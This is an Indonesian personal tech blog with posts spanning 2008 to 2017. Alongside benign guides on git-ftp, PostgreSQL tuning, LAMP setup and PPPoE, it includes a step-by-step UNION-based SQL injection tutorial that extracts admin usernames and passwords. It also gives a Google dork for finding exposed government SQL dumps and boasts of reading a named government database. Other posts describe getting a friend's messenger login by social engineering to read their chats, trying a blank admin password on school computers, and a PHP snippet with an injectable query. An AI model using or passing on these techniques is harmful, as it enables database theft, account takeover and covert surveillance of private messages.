Tampilkan postingan dengan label pengetahuan. Tampilkan semua postingan
Tampilkan postingan dengan label pengetahuan. Tampilkan semua postingan

Rabu, 20 September 2017

Sudah tahu Git-ftp?

Buat rekan-rekan yang terbiasa menggunakan git sebagai version control system codenya, dan biasanya terkendala dengan shared hosting yang terkendala fasilitas ini.
Langsung saja, untuk menggunakan ini yang kita butuhkan pastinya protokla ftp. Saya yakin shared hosting hampir semua memberikan fasilitas ini.

sudo apt-get install git-ftp

Setelah beres langsung saja kita konfigurasi dalam project yang pastinya sudah di iniasiasi git nya.

# Setup
git config git-ftp.url "ftp://ftp.example.net:21/public_html"
git config git-ftp.user "ftp-user"
git config git-ftp.password "secr3t"

Setelah di configurasi sekarang tinggal jalankan
# Upload all files
git ftp init

untuk selanjutnya biasanya hanya tinggal git add dan git commit
# add and commit
git add .
# commit
git commit -m "test"

Dan terakhir di push
# push
git ftp push
Terlihat sederhana dan yang pastinya kita lebih leluasa menambahkan atau mengurangi code pada aplikasi yang telah di berada di host.

Semoga berguna.

Salam,



Ref: https://github.com/git-ftp/git-ftp

Selasa, 04 Juli 2017

speed up postgresql: pg_restore

Untuk rekan-rekan yang mau restore data yang cukup besar, bisa menggunakan cara berikut ini:
  1. Open postgresql.conf
  2. Set shared_buffers (misal 512MB)
  3. Set maintenance_work_mem (misal 256MB)
  4. Set full_page_writes jadi off
  5. Set wal_buffers (misal 16MB)
  6. Set autovacuum jadi off
  7. Restart postgresql
Nb: Hanya untuk pg_restore

Selasa, 14 Februari 2017

Mari Menjaga Keamanan Website

Tulisan ini sebenernya suatu kekesalan saya pribadi terhadap banyaknya developer web yang tidak mengindahkan pentingnya sebuah pengamanan  website.

Setelah beberapa pekan terakhir saya berseluncur khususnya di website-website Indonesia banyak sekali yang saya temukan. Dan akan sedikit saya share disini mengenai yang saya temukan disini, tapi sekali lagi sebelum saya share disini, jauh-jauh hari saya sudah mengingatkan webmasternya atau administratornya dengan contoh melalui email, log, dll.

Apa saja yang saya temukan:


  1. Menampilkan/Mengupload File yang menurut saya tidak semestinya di upload atau Fatal. Silahkan Klasifikan sendiri :p.
    Mau itu terpublish atau tidak. Contoh kasus kita mengupload file .sql(berisi dump database). Pertanyaan selanjutnya apakah file tersebut bisa diselancar dan dicari? Jawabannya kemungkinan bisa! Karena beberapa features mesin pencari google bisa kita gunakan untuk ini. Sekali lagi, mau itu penting, tidak penting, rahasia, atau apapun tolong jangan sekali-kali asal upload ke server yang akhirnya menjadi boomerang untuk web/server tersebut.

    Kita contohkan saja

    Google Dork:
    Inurl:go.id Filetype:sql Intext:INSERT
    Silakan dicoba! Atau kita rubah menjadi Inurl:.id 
  2. Memakai plugin yang memiliki vuln.
    Saya sarankan developer sebelum memasang plugin dalam sebuah website untuk mencari tahu dahulu apa ada atau tidak bugs dalam plugin tersebut. Dan saya sangat sarankan lagi untuk membaca dan memahami kembali coding dalam plugin tersebut, karena biasanya ini bisa menyasar kemana-mana. Atau bisa dibilang efeknya dominos dan berkaitan dengan lainnya.
  3. SQL Injection.
    Ini pun sama, biasanya banyak developer tidak mengindahkan dan memahami apa itu SQL injection. Biasanya dalam feature shared hosting sudah mulai ditutupi dengan plugin plugin untuk menutupi ini. Tapi sekali lagi saya harapkan developer pun menjaga agar code yang dibuatnya tidak memiliki potensi untuk dimasukan sesuatu yang akhirnya menjadi fatal.
    Biasanya bagi mereka yang masih belum memahami ini akhirnya database bisa tercuri dan fatalnya lagi efek ini berkelanjutan. Dalam beberapa kasus seorang yang telah melewati SQL Injection bisa memasuki page administrator dan memasang backdoor. Apa itu shell, atau bahkan bisa sampai root(user tertinggi) dan akhirnya saya tidak perlu memberi tahu lagi apa efeknya.
    Contoh paling yang sangat fatal adalah saya berhasil melihat isian database dari website sumselprov.go.id
    Tapi sekali lagi saya tidak melakukan apa-apa, saya hanya meneliti saja di dalamnya. Dan sudah saya ingatkan melalui beberapa kali email, jawabannya: tidak ada balasan :))
  4. Unrestricted File Upload
    Di beberapa kasus juga biasanya para developer tidak mengindahkan dan memahami code yang dibuatnya. Akhirnya, sekali lagi siapapun bisa mengupload backdoor kedalam server tersebut. Dan efeknya? Silahkan dicoba sendiri :D saya sudah jelaskan diatas.
Sekali lagi sebetulnya masih banyak, tapi hanya itu dulu yang saya sampaikan. Harapan dan saran untuk kita semua untuk menjaga keamanan website sederhanan sekali. Aktif dalam forum, update, baca, dan jangan makan gaji buta:))
Aktif dalam artian memiliki keinginan untuk terus memperbaharui apabila setelah di analisis/dilaporkan memiliki banyak kekurangan dan celah keamanan.
Beberapa kasus disini sekali lagi hanya sebagian besar, dan masih banyak yang belum saya ketahui dari berbagai aspek lainnya. Mungkin nanti dapat ditambahkan oleh teman-teman yang lain.

Jadi kesimpulannya adalah : Mari Menjaga Keamanan Website :)

Sedikit quotes untuk para web developer untuk lebih semangat dan bekreasi:

Most good programmers do programming not cause they expect to get paid/get adulation by the public, but cause it is fun to program. ~Linus Torvalds

Akhir kata, SALAM BERSAMA!! Hehehe



Senin, 14 Mei 2012

Seringnya paket dalam Blackberry 'jebol'

Mungkin bagi pengguna smartphone blackberry ada yang pernah mengalami 'jebolnya' paket dalam sistem blackberry tersebut. Tulisan ini bukan mengenai cara atau tips bagaimana paket tersebut bisa kita 'jebol'.

Dari beberapa survey (dan saya sendiri pernah mengalami hal ini) ada beberapa faktor yang menyebabkan paket ini bisa jebol :

  1. Adanya crash atau bug dalam server pusat dimana database tersimpan, artinya dengan tidak kita tidak sengaja pun 'jebol' paket ini akan terjadi.
  2. Adanya pengiriman data yang berlebih, pengiriman data berlebih disini dari kita sendiri. Dalam konteks permintaan paket (seperti yang pernah saya alami) kadang respon dari server mengalami delay (mungkin karena banyaknya pengguna) dan kita mengirim permintaan yang berlebih. Alhasil ternyata server menganggap ini beberapa permintaan dalam keadaan yang pertama (pulsa tetap tapi perpanjangan terus diberikan).
  3. Dan terakhir (ini bukan jebol namun lebih pantas dibilang lamban :D) saat sinyal yang terjadi tidak memungkinkan pemutusan (saat di server database expired namun pemberitahuan terhadap pengguna tidak tersampaikan atau mengalami delay) sehingga jalur kita tetap mengirimkan dan memungkinkan server membalas positif (menerimanya)

Sekali lagi ini bukan tips atau cara, namun lebih terhadap pengetahuan dan penelitian terhadap sesuatu tersebut bisa terjadi. Jika ada yang ingin menambahkan silahkan ;)

CMIIW

Regards

Kamis, 19 Mei 2011

Membuat Tweetlonger di Aplikasi Webclient Sendiri

Oke guys, salam...
kali ini gue bakalan membahas tentang php. Ya langsung to the point aja, awalnya buat kalian yg suka buat apps for twitter seperti webclient mungkin udah banyak yang buat, tapi cukup untuk tweetlonger mungkin baru dikit. Kali ini gue bakalan bahas code-code yg dibuat sendiri untuk sinkron sama aplikasi sama yang kalian buat. Scriptnya gue ulik-ulik sendiri, tapi diambil dari beberapa sumber seperti php.net. Untuk itu ayo kita coba bareng.

*Bila kalian pake dabr dan dabr itu udh di host udah jalan tinggal dipake
**Bila belum udah banyak ko post-post yg membahas cara membuat webclient buat twitter

Nah semua telah berjalan..
Skrng logikanya seperti ini


Ini penjelasannya

Jika tweet lebih dari 140 karakter maka akan disimpan di database,
setelah itu tweet akan dibuka kembali dan akan mempunyai url, url tweet
yg lebih dari 140 karakter akan di short. Setelah mendapat short, tweet
yg 140 karakter akan dipotong *semisal menjadi 125* setelah dipotong tweet
akan disambungkan dengan hasil short url. Setelah semua bergabung maka akan langsung dikirim k twitter



Untuk logikanya kita sudah dapat tinggal scriptnya
Script pertama berada di bagian fungsi update untuk dabr.

Ini adalah scriptnya

function twitter_update() {
  twitter_ensure_post_action();
  $status = twitter_url_shorten(stripslashes(trim($_POST['status'])));
  if ($status) {
    $request = 'http://twitter.com/statuses/update.json';
   

    $total=strlen($status);
    if($total>=140)
    {
        mysql_connect("localhost","user","pass");
        mysql_select_db("database");
        $username=user_current_username();
        mysql_query("INSERT INTO archive (username,status,datetime) VALUES('$username','$status',''); ");
        $query=mysql_query("SELECT * FROM archive ORDER BY id DESC LIMIT 0,1");
        $hasil=mysql_fetch_array($query);
        $status2= substr($status,0,125);
        $longurl= 'http://www.test123.com/tweetlonger/index.php?id='.$hasil[id];
        $request = 'http://shorturl.com/?url=' . urlencode($longurl);
        $response = file_get_contents($request);
          $status3= twitter_url_shorten($status2 . " .." . $response);
    }
else
{
$status3=substr($status,0,140);
}
    $post_data = array('source' => 'Dabr', 'status' => $status3);
    $in_reply_to_id = (string) $_POST['in_reply_to_id'];
    if (is_numeric($in_reply_to_id)) {
      $post_data['in_reply_to_status_id'] = $in_reply_to_id;
    }
    $b = twitter_process($request, $post_data);
  }
  twitter_refresh($_POST['from'] ? $_POST['from'] : '');
}

Sedikit penjelasan
localhost=host
user=user
pass=pass
database=database
*dimasukan kedalam file twitter.php di fungsi sebelumnya dirubah dengan yg ini

Selanjutnya kita buat database dulu
Buat table dengan nama archive
Lalu buat column id, username,status, datetime

Setelah itu buat file untuk membuka status yg disimpan di database,
semisal saya memberi link www.test123.com/tweetlonger/index.php?id=

Isi file index.php adalah perintah php untuk menampilkan database ini. Kalo
anda tak mengerti nanti saya berikan contohnya

Setelah semua selesei dibuat
anda harus mencari tempat men-short url,
banyak layananan untuk ini. Anda dapat memilihnya sendiri..

Setelah semua telah terpasang tinggal dicoba apakah tweetlonger anda jalan atau tidak
Yang terpenting logikanya bener, ayo ayo dicoba :D
Semoga berguna :)

Minggu, 12 Juli 2009

Tebak-tebakan di Jaringan Lain

Ini berawal ketika saya hendak mengikuti test di salah satu sekolah terfavourit di bandung. Kebetulan ayah saya sendiri seorang guru disitu.
Komputer pun mulai saya nyalakan, masuk ke salah satu sistem operasi buatan m1cr*s0ft dan masuk pula ke hak akses user terbatas . "Ah !" Sudah malas ketika itu. Mulai mengotak-ngatik ini itu. Ctrl+Alt+Del memasukan user admin password kosong tidak bisa. Akhirnya bermodalkan internet ex*lorer (firefox saja tidak ada, apalagi y!m). Saya mencoba download ini itu. Menginstal ini itu tapi tidak mempunyai hak akses. Y!M tidak bisa terinstall karena tidak ada hak akses.
Namun ternyata browser firefox dapat terinstall.
Yah sukurlah, saya pun membukanya.
Yah, jawabannya hanya sekedar "Server not found"
aneh ? ya ! akhirnya saya ingin melihat konfigurasi ie nya. Tapi ternyata tidak bisa. Okey kita coba untuk lihat details ip dan gateway dari jaringan ini.
Ini itu saya masuki dan dapat juga ip komputer ini.
"192.168.***.**"
Saya coba memakai proxy, dengan anggapan bahwa untuk mengakses port 80 sepertinya harus melewati proxy lokal !
Saya coba di ie memasukan ip gateway tersebut, ternyata memang (memakai squid).
Portnya sendiri saya tebak port defaultnya (3128), bener kan ?
Ya saya masukan port segitu dan menjalankan firefox seperti biasa.
Okey, yang sekarang saya butuhkan adalah im.
Saya coba beberapa fasilitas di internet khususnya yang web messenger namun banyak permasalahan. Mulai dari flashplayer (tidak bisa diinstall karena hak user terbatas), dan lain-lain. Tidak putus asa segitu saja saya coba mendownload im favourit saya di ubuntu.
Apalagi kalau bukan pidgin !
Yah langsung menuju websitenya akhirnya saya download versi w1nd0w5nya.
Install !
dan hasilnya bisa , berjalan dengan lancar pula.

Hikmah yang bisa kita ambil, kalo firefox ga jalan tetapi ie ternyata jalan berarti itu firefox harus memakai proxy.
Dari mana kita mendapatkan ip proxy lokalnya ?
Lihat dulu ip komputer kita dan lihat gatewaynya.
Untuk port bisa tebak-tebakan (semisal : 8080,3128,dll) kalo tidak tertebak coba pakai port scanner.
Untuk hak akses terbatas sebaiknya sabar dulu, sekarang juga sudah banyak beredar untuk membypass password amin di w1nd0w5xp.

Sabtu, 06 Juni 2009

Pidgin-Rhythmbox di Jaunty

Kebanyakan sibuk dengan dunia nyata saya sudah jarang menulis blog lagi dan pada kesempatan kali ini saya akan share sedikit tips and trick.
Bila anda ingin status im pidgin anda terupdate(sinkron) otomatis dengan rhythmbox anda kali ini saya akan memberikan tipsnya.
Pertama kita download dulu paketnya.
jon.oberheide.org/projects/pidgin-rhythmbox/

Atau bila anda ingin yang berpaket debian bisa di download di
http://simon.lauger.name/debian/pidgin-rhythmbox/pidgin-rhythmbox_2.0-1_i386.deb
Setelah di download lalu tinggal di install.
hanya membutuhkan sedikit waktu maka plugins tersebut telah terinstall.
Sekarang masuk ke pidgin tekan Ctrl+U atau masuk menu tools dan pilih plugins.
Cari plugins yang bernama Pidgin-Rhythmbox 2.0 lalu centang
Jangan lupa untuk menconfigure agar lebih mengoptimalkan plugin tersebut.
dan bisa anda edit2 sendiri.
lalu ketikan
%rb
di status anda tunggu beberapa saat dan hasilnya akan seperti ini
Menarik ?
silahkan dicoba

Salam

Minggu, 03 Mei 2009

10Mbps di Ubuntu Jaunty

Bagi kalian-kalian yang pusing bagaimana merubah dari 100 ke 10, kali ini saya akan berbagi tips sedikit. Mau full atau half berikut adalah sintaknya.
Kita menggunakan ethtool.
#sudo ethtool -s eth0 speed 10 duplex full
untuk -s adalah sintak untuk merubah
lalu eth0 adalah lan card onboardnya
speed itu kecepatannya dan yang saya pakai adalah 10. Bisa dirubah ke 100 dan 1000.
duplex yang saya pakai adalah full, bisa juga kita menggunakan half.

Oke mungkin cukup segitu saja.
Untuk lebih lengkapnya bisa menggunakan -h
#sudo ethtool -h
"keep share"
thx, juniorsev3n

Kamis, 26 Maret 2009

Kurangnya Keamanan Pada Situs-Situs Pemeritah

Kemarin-kemarin saya tidak sengaja mencoba untuk berjalan-jalan. Masuk sana-sini dan coba saya liat-liat. Tak banyak yang ditemukan. Saya hanya mencoba sql injection. Namun banyak juga ternyata.
Screenshot :



Ini adalah sebagian kecil dari banyaknya situs pemerintah yang tidak baik pengamanannya.
Untuk admin-admin harap memperbaiki situsnya. Dari semua ini rata-rata melewati sql injection. Selamat Memperbaiki admin :D

Rabu, 04 Maret 2009

Install dan Setting Aplikasi WebServer (Apache,Mysql,PhpMyAdmin,PHP) di Ubuntu Jaunty



Dengan judul seperti itu sengaja saya menulisnya disatukan, karena aplikasi tersebut menurut saya sepaket. Hehe
Kali ini saya menginstall dan menyettingnya satu-satu tidak langsung semuanya.
Pertama dari apache dulu,oke langsung aja..
#sudo apt-get install apache2
Tunggu beberapa saat dan akan mulai terinstall, tidak ada yang saya setting untuk sekarang dan saya setting nanti di akhir.
Selanjutnya menginstall modules mysql
#sudo apt-get install libapache2-mod-auth-mysql
Yah tunggu dan apabila sudah selesai selanjutnya kita restart apachenya
#sudo /etc/init.d/apache2 restart
Selanjutnya install php5
#sudo apt-get install php5 libapache2-mod-php5
dan tidak lupa menginstall php5mysql nya karena php kita pakenya yang mysql
#sudo apt-get install php5-mysql
selanjutnya kita restart lagi apachenya,sama pake sintak yang tadi..

Sekarang kita menginstall mysql servernya
#sudo apt-get install mysql-server
Terus tunggui nanti akan keluar tahap password untuk root nya. Tinggal diisi deh, sekarang kita restart mysql-servernya
#suda /etc/init.d/mysql restart
Selanjutnya kita menginstall phpmyadmin
#sudo apt-get install phpmyadmin
Tunggu dan nanti akan ada konfigurasinya jangan lupa untuk memilih apache2. Dan nanti akan disuruh memasukan password dll.
Sekarang kita coba untuk memasukan konfigurasi ke konfigurasi apache nya.
Masuk ke konfigurasi apache2 nya
#sudo gedit /etc/apache2/apache2.conf
dan masukan baris berikut
include /etc/phpmyadmin/apache.conf
Dengan begitu sekarang kita bisa mengakses phpmyadmin, kita bisa buka lewat browser
http://localhost/phpmyadmin
Untuk lebih mudah saya menggunakan rapache, dari rapache tersebut kita lebih mudah untuk mengatur apache secara instant.
Untuk menginstall rapache gunakan perintah berikut.
#sudo apt-get install rapache
Setelah diinstall seting2 apache bisa lewat sini..
Lebih mudah bukan ?? hehe
Kita dapat mengatur documentroot , modules apache dan melihat log files.

Senin, 02 Maret 2009

Tersesat Karena Tersendatnya Upgrade ke 9.04 [ beta ]


Yah itulah saya, selalu keras kepala. Begini ceritanya, mulai dari saya install ulang ubuntu saya. Saya install dari versi 8.04, karena belum punya cd yang terbarunya ya terpaksa memakai yang ada. Yah sudah selesai menginstall saya langsung upgrade ke 8.10 tak lupa saya memakai server lokal (terima kasih buat repositorynya indika :-D). Sudah selesai upgrade semalaman akhirnya saya coba-coba untuk upgrade ke 9.04 alpha. Yah karena kebodohan saya diikuti situasi yang buruk dengan keadaan saya mau pergi dan juga lamanya (takutnya mati listrik) akhirnya ke 9.04 dieksekusi. Saya pun pergi bermain. Pulang-pulang ternyata komputer sudah mati ! Oh no !! Curiga ini upgrade belum selesai. Ternyata benar !! Ah saya pun masuk ubuntu dan pada saat masuk jendela login loadingnya lama banget. Sudah saya perkirakan. Akhirnya saya masuk ke recovery moda disana saya coba melanjutkan upgrade. Sialnya upgrade butuh koneksi internet dan koneksi internet saya pun harus dijalankan. Akhirnya saya masuk dulu ke hardisk kecil yang didalamnya terdapat sistem operasi mr.gate. Disana saya browsing-browsing dan cari-cari command line untuk menjalankan pppoe. Oke ketemu !! Karena keasikan saya tidak langsung kembali ke masalah yang tadi. Malah terlena sampe beberapa hari diiringi juga main. Maklumlah anak muda suka main.
Oke saya menemukan command linenya
sudo pppoeconf
Ternyata bisa tinggal oke,next,dan ngisi-ngisi lah gampang.
Dan melanjutkan dengan upgrade. Haduh lama, tapi karena saya orang sabar akhirnya selesai juga. Dengan ketakutan saya pun masuk ke ubuntu yang graphicnya. Okey jalannnnn
hahaha anehnya di network malah device not managed.
Jadinya sekarang saya memakai command yang tadi dalam menjalankan pppoe.
huhu ribet tapi mengasikan.

Senin, 12 Januari 2009

SSH Tunneling with Putty

Sebenarnya ini tulisan saya ambil dari situs teman-teman saya dan saya sendiri termasuk di dalamnya (cangkangsuuk.org). Maaf juga tulisan ini dibuat dalam bahasa inggris, bukan karena tidak menghargai bahasa sendiri tapi karena ingin mencoba-coba menulis dalam bahasa inggris.

An SSH tunnel is an encrypted tunnel created through an SSH protocol connection. SSH tunnels may be used to tunnel unencrypted traffic over a network through an encrypted channel. For example, Windows machines can share files using the SMB protocol, which is not encrypted. If you were to mount a Windows filesystem remotely through the Internet, someone snooping on the connection could see your files. To mount the Windows filesystem securely, you can establish an SSH tunnel that routes all SMB traffic to the remote fileserver through an encrypted channel. Even though the SMB protocol itself is unencrypted it is secure because it travels through the encrypted SSH channel.

To create an SSH tunnel, an SSH client is configured to forward a specified local port to a port on the remote machine. Once the SSH tunnel has been established, the user can connect to the specified local port to access the network service. The local port need not be the same as the remote port.

SSH tunnels provide a means to bypass firewalls that prohibit certain Internet services provided that outgoing connections are allowed. For example, an organization may prohibit a user from accessing Internet web pages (port 80) directly without passing through the organization’s proxy filter which provides the organization a means of monitoring and controlling what the user sees through the web. The user may not wish to have their web traffic monitored or blocked by the organization’s proxy filter. If a user is able to connect to an external SSH server, it is possible for them to create an SSH tunnel to forward a given port on their local machine to port 80 on a remote web server. To access the remote web server the user would point their browser to http://localhost/.

Some SSH clients support dynamic port forwarding that allows the user to create a SOCKS 4/5 proxy. The user can configure his/her applications to use their local SOCKS proxy server. This is more flexible than creating an SSH tunnel to a single port as previously described. With SOCKS the user is not limited to connecting only to a predefined remote port and server.
(http://en.wikipedia.org/wiki/Tunneling_protocol#SSH_tunneling)

Before use SSH Tunneling,you must have an SSH account. Next, make sure Putty already installed on your computer. After sure Putty already installed, open Putty. Fill column Host Name (or IP address) with your account ssh host name. Then select SSH at menu. It will be out submenu Tunnels. Click the Tunnels submenu. Fill Source Port with 8080 but you are free to fill it with the numbers only provided that does not collide with any other port. Click Open. Then, you must fill the username and password. After successfully login, minimize Putty and open web browser. Then settings proxy with localhost and port 8080 or your fill number column Source Port on putty. And then, click SOCKS 5. Click OK.

Selasa, 30 Desember 2008

Share My PhpProxy

Kali ini saya hanya ingin sedikit share proxy di hosting saya. Meskipun sudah banyak bertebaran webproxy namun bagi yang ingin aman bisa menggunakan webproxy saya..hehe.
ini link proxynya :
http://www.juniorsev3n.net/tools/proxy/
untuk download bisa di
http://sourceforge.net/project/showfiles.php?group_id=110693
Namun bagi yang tidak suka webproxy saya sedikit share proxy lokal yaitu :
proxies.telkom.net.id:8080

Salam

irfan

Sabtu, 20 Desember 2008

Saat komputer lab di sekolah dibatasi penggunaannya

Ini adalah salah satu pengalaman saya sendiri,setidaknya saya ingin mem-posting artikel dari dulu namun karena banyak sekali masalah barulah saya posting kali ini.Seperti yang saya alami bahwa komputer di laboratorium sekolah memakai dua user,yah tau sendiri memakai sistem operasi bajakan dengan user administrator dan siswa. Memakai user siswa sungguh banyak sekali pembatasannya. Seperti orang seperti saya yang inginnya selalu mendapatkan hak akses paling tinggi. Akhirnya saya gunakan cara yang dulu pernah saya baca, dengan tingkat keberhasilan yang belum pasti. Karena saya sendiri pun belum pernah melakukan cara itu. Dengan komputer lab sekolah sebagai bahan percobaan. Akhirnya saya gunakan cara :
Langkah pertama, pada saat startup wind0w5 xp kan di lab sekolah itu memilih user, antara user admin dengan siswa. Saat itu coba ketikan Control+Alt+Delete,yah seperti banyak di informasi dari artikel2 lain maka akan muncul jendela login yang bisa memasukan user dan password.
Langkah kedua, coba masukan user dengan "administrator" dan password kosongkan saja.
Apabila berhasil itu berarti ada kesalahan dari sang admin atau guru TIK di sekolah,kesalahannya terdapat pada user administrator dibuat dua, yaitu user admin default dan user admin yang dibuat baru. Karena admin default biasanya tidak diberi password. Namun apabila gagal berarti sang admin memakai user admin default dan admin default tersebut diberi password.
Yah cukup sekian tips untuk kali ini.

Salam hangat

irfan

Sabtu, 22 November 2008

Memata-matai lewat shmessenger

Sudah lama saya tidak menulis blog,dan kali ini ada kemauan menulis :D.
Tidak perlu basa-basi kali ini saya hanya ingin menjelaskan sedikit saja.
Tapi cara ini anda memerlukan userid dan password pengguna shmessenger tersebut.Cara mendapatkannya bisa dengan social engineering.Yah contohnya seperti saya ke teman saya yang satu ini.Namanya ricky (hanya contoh).
j : ky,nginjem id sh lah
r : jang naon ?
j : jang ol blegug !
r : ouh
j : yueh id na (kulkas) passna(**)
j : nuhun ah

Padahal tujuan saya sebenarnya bukan untuk online saja.Tapi istilahnya untuk tracking.Maaf juga bahasa yang diatas adalah bahasa sunda.Lanjut..
Setelah mendapatkan userid dan password kita menuju ke website shmessenger.Urlnya http://shmessenger.ro lalu login.
dan akan muncul tampilan seperi ini.


Karena sebelumnya kita belum meng-save message di archive jadi kita setting dulu.klik settings dan ceklis save messages in archive.

Setelah di save kita hanya menunggu waktu:D.Setelah satu hari coba kita buka lagi.
Sekarang setelah login pilih archive dan protokolnya YMSG. Knp YMSG ? yah karena dia pakenya yahoo messenger.:D

Lanjut...

nah itu list yang make id tersebut..ternyata ada id saya juga.hehe:D
sekarang pilih salah satu.Mau yang mana terserah anda.hihi
Nah uda milih salah satu nanti akan ada id-id yang chat dengan id yang dipilih tersebut.
Contohnya


dan dengan begitu berakhir sudah tulisan untuk kali ini.
Salam hangat

juniorsev3n

Minggu, 02 November 2008

Connect PPPOE at Ubuntu 8.10

Sebelum tutorialnya saya bercerita sedikit.hehe


Akhirnya upgrade juga dari hardy ke intrepid yang kurang lebih menghabiskan waktu 1 malam lebih. Berawal dari kemarin sore saya menginstall ulang ubuntu 8.04,sebenarnya saya sudah mengupgrade ke intrepid namun ternyata upgrade yang pertama mengalami beberapa gangguan. Saya pun kembali ke awal dan menginstall ubuntu hardy.Maklumlah yang intrepid saya belum pesan. Setelah menghabiskan kurang lebih satu jam akhirnya penginstallan selesai dan langsung saja tanpa basa-basi saya upgrade.Waktu itu kira-kira sore.Karena tidak ada kerjaan,sambil di upgrade saya browsing dan ym-an.Upgradenya terjadi dari sore itu hingga besoknya (sekarang) jam 12 lebih 25 menit.Cukup lamakah ? Wajarlah,bandwidth yang minim tambah browsing dan ym-an pula.


Lanjut,
setelah masuk ke intrepid
buka
netword connections
pilih sub menu DSL
lalu pilih add
ini screenshotnya



klik ok
dan anda akan tersambung

salam
juniorsev3n

Jumat, 31 Oktober 2008

Online YM di web

Bila pusing-pusing cari software buat YM-an anda bisa coba gunakan
http://www.ebuddy.com lalu pilih yahoo buat yang sukanya YM-an. Yang lainnya juga bisa namun saya coba untuk melakukan ym-an. Ketika sudah login makan akan keluar jendela baru .
Dan inilah kira-kira screenshotnya.


nah ebuddy sendiri bisa anda pakai di handphone.
ebuddy sekarang sudah cukup terkenal dan sudah banyak sekali orang-orang yang memakainya. Setelah melihat websitenya pemakai ebuddy mencapai 60.000.000 .Sungguh banyak sekali bukan ? So,kita coba aplikasi ini.

Minggu, 07 September 2008

SQL Injection Tutorial Melalui recordID

*mysql

Sebelum membaca artikel ini sebaiknya anda membaca artikel tentang
http://juniorsev3n.blogspot.com/2008/07/script-php-from-dreameaver-8.html
karena ini menerangkan bagaimana sql injection ini bisa terjadi.
Saya beri tahu lagi bahwa bug nya terdapat pada
WHERE id=$recordID
untuk id itu tidak selalu id tapi tergantung pada sang webmaster.
Langsung aja.

Langkah pertama adalah mengecek bug tersebut.
dengan memberikan tanda single quote ( ' ) di recordID
Semisal :
news.php?recordID=1'
Nah apabila tampak pesan error berarti kita bisa melanjutkannya.

Langkah kedua adalah mengecek column yang berada di table tersebut
dengan cara menggunakan perintah ORDER BY
Semisal :
news.php?recordID=1+ORDER+BY+1/*
nah apabila nilainya true maka column/field tersebut ada.
artinya kita harus mencari tahu ada berapa nilai yang true !
untuk mencari nilai tinggal ganti saja angka satu tersebut.
Semisal :
news.php?recordID=1+ORDER+BY+2/*
news.php?recordID=1+ORDER+BY+3/*
Nah apabila nilainya masih true berarti column/field itu ada.Dan apabila nilainya
sudah false berarti column/field itu tidak ada.Semisal column/field hanya ada 3 saat kita memasukan angka 4 maka akan muncul pesan error di halaman tersebut.
Note : /* adalah tag comment pada SQL dan kita memakai ini untuk tidak mengaktifkan perintah setelah tag comment.
Lain-lain tag comment : // , -- , # ,etc


Langka ketiga adalah menampilkan column/field yang ditampilkan.
dengan menggunakan perintah UNION ALL SELECT
semisal :
news.php?recordID=-1+UNION+ALL+SELECT+1,2,3/*
Q : Mengapa harus menggunakan -1 ?
A : tidak selalu -1 tetapi yang nilainya false.
Nah dengan menggunakan perintah itu maka akan keluar nomor2 di halaman.
Itu menandakan nomor2 itulah yang di outputkan.
Dengan demikian kita menggunakan fungsi2 di nomor2 yang dikeluarkan.
semisal nomor yang dikeluarkan adalah 2 dan 3 . Berarti fungsi2 disimpan di nomor 2 dan 3 atau salah satunya. Kalau kita memasukin di nomor yang tidak ditampilkan maka yang diperintahkan tidak akan keluar.

Langkah selanjutnya adalah memberikan fungsi2 mysql.
dengan memberikan version() , user() , database() ,etc
nah untuk mengecek version mysql masukan fungsi version()
untuk melihat user yang digunakan masukan fungsi user()
untuk melihat nama database yang digunakan masukan fungsi database()
Semisal :
news.php?recordID=-1+UNION+ALL+SELECT+1,version(),user()/*
Nah di halaman akan menampilkan version mysql dan user nya.
Semisal versionnya 5 keatas dan usernya bebas
Maka kita bisa lanjutkan tetapi apabila versionnya 4 atas 5 kebawah sebaiknya cari target yang lain.
NOTE : apabila usernya root , berbahagialah. karena root adalah user yang tertinggi.Kita bisa menampilkan user2 dan password mysql.
Nah selanjutnya adalah menampilkan table2 yang ada.
NOTE : supaya lebih ringkas kita tampilkan saja table2 yang hanya ada di database
Semisal :
news.php?recorID=-1+UNION+ALL+SELECT+1,group_concat(table_name),3+
FROM+information_schema.tables+WHERE+table_schema=database()/*
group_concat adalah fungsi untuk menampilkan semuanya yang ada di column/field itu.
Anda bisa menggunakan fungsi2 lain sesuai kebutuhan. concat(),concat_ws(),etc.
table_name adalah column/field yang terdapat di table tables.
information_shema adalah database tempat penyimpanan data2 skema.
tables adalah table yang bernama tables tempat penyimpanan nama2 table tersebut.
nah dengan demikian di halaman akan muncul nama2 table yang hanya ada di database saja.
untuk menampilkan semuanya anda hanya perlu menghilangkan WHERE table_schema=database()

Apabila terdapat table2 yang berbau tempat penyimpanan database user/admin anda ingat2 nama table itu atau copy paste saja ke Applications->Aksesoris->Penyunting Berkas Teks
hehe,,promosi dikit [ ubuntu 8.04 ]

Nah apabila sudah mendapatkan nama2 table selanjutnya adalah mencari nama2 column/field.
Semisal :
news.php?recordID=-1+UNION+ALL+SELECT+1,group_concat(column_name),3+
FROM+information_schema.columns+WHERE+table_schema=database()/*
Nah maka akan menampilkan column/field yang tedapat di database.
Apabila mendapat yang berbau username atau password ya itulah berarti column yang akan kita keluarkan.tetapi apabila sukses dengan menggunakan perintah semisal :
news.php?recordID=-1+UNION+ALL+SELECT+1,group_concat(column_name),3+
FROM+information_schema.columns+WHERE+table_name='user'/*
user adalah contoh table tempat penyimpanan data2 user dan password.
Maka akan keluar column yang berada di table user.
Tapi kalo muncul pesan eror sebaiknya guna cara yang tadi.
Nah apabila kita sudah mendapat nama2 column/field dan table langkah selanjutnya adalah mengeluarkan data username dan password admin.

Semisal :
news.php?recordID=-1+UNION+ALL+SELECT+1,
group_concat(concat(username,0x3a,password)),3+FROM+user/
nah maka akan tampil semua data username dan password di table user
Apabila hasilnya enkripsi anda harus mengcracknya dulu
Apabila password nya bukan enkripsi yang berbahagialah karena tidak usah
cape2 mengcracknya.
Sekarang anda tinggal login ke halaman adminnya.

Ya,,mungkin cukup sekian dulu yang bisa saya tulis
mungkin banyak kesalahan dan kekurangan jadi saya mohon maaf.
Correct Me IF I'm Wrong (CMIIW)
hehe

Salam hangat,
juniorsev3n